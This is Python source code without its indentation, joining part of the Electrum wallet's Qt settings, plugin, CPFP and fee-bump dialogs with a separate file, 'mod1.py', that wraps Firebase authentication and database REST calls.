index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
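# Combo index mapping: 0 = static fee rate, 1 = ETA-based dynamic fees,
# 2 = mempool-depth-based dynamic fees.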
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
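# Changing the base unit updates decimal_point, re-renders the lists, and
# re-applies the satoshi amounts currently in the edits so they keep their value.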
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
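        # Illustrative arithmetic only (values assumed, not read from the running
        # config): with fee_per_kb = 10000 sat/kB and a combined parent+child size
        # of 350 bytes, the suggested fee is 10000 * 350 / 1000 = 3500 sat.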
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
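        # The dialog pre-fills the new fee at 1.5x the original fee as a starting
        # suggestion; the slider and the amount field can still override it.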
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
|
mod1.py
|
import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except:
from urllib import urlencode, quote
import json
import math
from random import uniform
import time
from collections import OrderedDict
from sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from gcloud import storage
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import python_jwt as jwt
from Crypto.PublicKey import RSA
import datetime
def lets_do_it(config):
return Firebase_with_python(config)
class Firebase_with_python:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config["apiKey"]
self.auth_domain = config["authDomain"]
self.database_url = config["databaseURL"]
self.storage_bucket = config["storageBucket"]
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials.from_json_keyfile_name(config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials.from_json_keyfile_dict(config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment
            # related to https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.', error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(max_retries=3)
else:
adapter = requests.adapters.HTTPAdapter(max_retries=3)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(self.credentials, self.api_key, self.database_url, self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid
}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=60)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token", "refreshToken": refresh_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getAccountInfo?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/resetPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8" }
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
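    # Each query-builder method above records its parameter in build_query and
    # returns self, so calls chain left to right, e.g. (hypothetical data):
    #   db.child("users").order_by_child("age").limit_to_first(10).get()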
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def build_request_url(self, token):
parameters = {}
if token:
parameters['auth'] = token
for param in list(self.build_query):
if type(self.build_query[param]) is str:
parameters[param] = quote('"' + self.build_query[param] + '"')
elif type(self.build_query[param]) is bool:
parameters[param] = "true" if self.build_query[param] else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(convert_to_pyre(request_dict.items()), query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
sorted_response = sorted(request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(request_dict.items(), key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
